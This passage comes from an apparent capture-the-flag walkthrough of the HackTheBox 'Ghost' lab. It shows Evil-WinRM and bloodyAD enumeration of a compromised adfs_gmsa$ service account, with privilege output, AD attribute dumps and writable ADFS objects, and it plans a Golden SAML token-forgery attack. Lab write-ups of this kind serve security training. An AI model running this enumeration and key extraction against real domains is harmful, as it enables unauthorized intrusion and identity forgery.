adfs_gmsa$
Checking for user privileges of the adfs_gmsa$ account after making the lateral movement
*Evil-WinRM* PS C:\Users\adfs_gmsa$\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
ghost\adfs_gmsa$ S-1-5-21-4084500788-938703357-3654145966-4101
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
GHOST\Domain Computers Group S-1-5-21-4084500788-938703357-3654145966-515 Mandatory group, Enabled by default, Enabled group
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.The adfs_gmsa$ account doesn’t have any notable privilege, aside from SeMachineAccountPrivilege
AD Federation
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=adfs_gmsa\$@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get object 'adfs_gmsa$' | grep -v nTSecurityDescriptor:
distinguishedName: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
cn: adfs_gmsa
dNSHostName: federation.ghost.htb
dSCorePropagationData: 1601-01-01 00:00:00+00:00
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2024-07-18 13:50:07.440161+00:00
lastLogonTimestamp: 2024-07-18 13:48:56.493662+00:00
logonCount: 41
memberOf: CN=Remote Management Users,CN=Builtin,DC=ghost,DC=htb
msDS-GroupMSAMembership: AQAEgGQAAAAAAAAAAAAAABQAAAAEAFAAAgAAAAAAJAD/AQ8AAQUAAAAAAAUVAAAANIl08/158zeu183Z6AMAAAAAJAD/AQ8AAQUAAAAAAAUVAAAANIl08/158zeu183ZFw4AAAECAAAAAAAFIAAAACACAAA=
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAagEAABEAAAAAAAAAH33uQ1GTzzYRS2XM5QP0SwAAAAAUAAAAFAAAAGcAaABvAHMAdAAuAGgAdABiAAAAZwBoAG8AcwB0AC4AaAB0AGIAAAA=
msDS-ManagedPasswordInterval: 30
msDS-ManagedPasswordPreviousId: AQAAAEtEU0sCAAAAagEAAA4AAAAYAAAAH33uQ1GTzzYRS2XM5QP0SwAAAAAUAAAAFAAAAGcAaABvAHMAdAAuAGgAdABiAAAAZwBoAG8AcwB0AC4AaAB0AGIAAAA=
msDS-SupportedEncryptionTypes: 28
name: adfs_gmsa
objectCategory: CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=ghost,DC=htb
objectClass: top; person; organizationalPerson; user; computer; msDS-GroupManagedServiceAccount
objectGUID: {14385003-dbb5-4a46-8a87-555081d0de92}
objectSid: S-1-5-21-4084500788-938703357-3654145966-4101
primaryGroupID: 515
pwdLastSet: 2024-07-02 14:39:04.978779+00:00
sAMAccountName: adfs_gmsa$
sAMAccountType: 805306369
servicePrincipalName: host/federation.ghost.htb
uSNChanged: 147546
uSNCreated: 30281
userAccountControl: WORKSTATION_TRUST_ACCOUNT
whenChanged: 2024-07-18 13:48:56+00:00
whenCreated: 2024-02-03 01:29:14+00:00The adfs_gmsa$ account is a Managed Service Accounts with its SPN set to host/federation.ghost.htb
This indicates that the account is likely responsible for the AD Federation Service
Therefore, it would be possible to extract both DKM keys and Token Signing key to forge a SAML token, namely Golden SAML Attack
┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ KRB5CCNAME=adfs_gmsa\$@dc01.ghost.htb.ccache bloodyAD -d GHOST.HTB -k --host dc01.ghost.htb get writable
distinguishedName: CN=CryptoPolicy,CN=5ef3db40-8c5c-4534-8ed7-b8ff12541e81,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=9c73b27d-de3f-4c85-93a8-d38a875dd04b,CN=5ef3db40-8c5c-4534-8ed7-b8ff12541e81,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=5ef3db40-8c5c-4534-8ed7-b8ff12541e81,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=CryptoPolicy,CN=f8cadcbe-917c-4929-afe0-6ad20854a7d0,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=3cc19098-c626-4d0c-895c-95f656800985,CN=f8cadcbe-917c-4929-afe0-6ad20854a7d0,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=f8cadcbe-917c-4929-afe0-6ad20854a7d0,CN=ADFS,CN=Microsoft,CN=Program Data,DC=ghost,DC=htb
permission: CREATE_CHILD; WRITE
OWNER: WRITE
distinguishedName: CN=adfs_gmsa,CN=Managed Service Accounts,DC=ghost,DC=htb
permission: WRITE
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=ghost,DC=htb
permission: WRITE
distinguishedName: CN=TPM Devices,DC=ghost,DC=htb
permission: CREATE_CHILD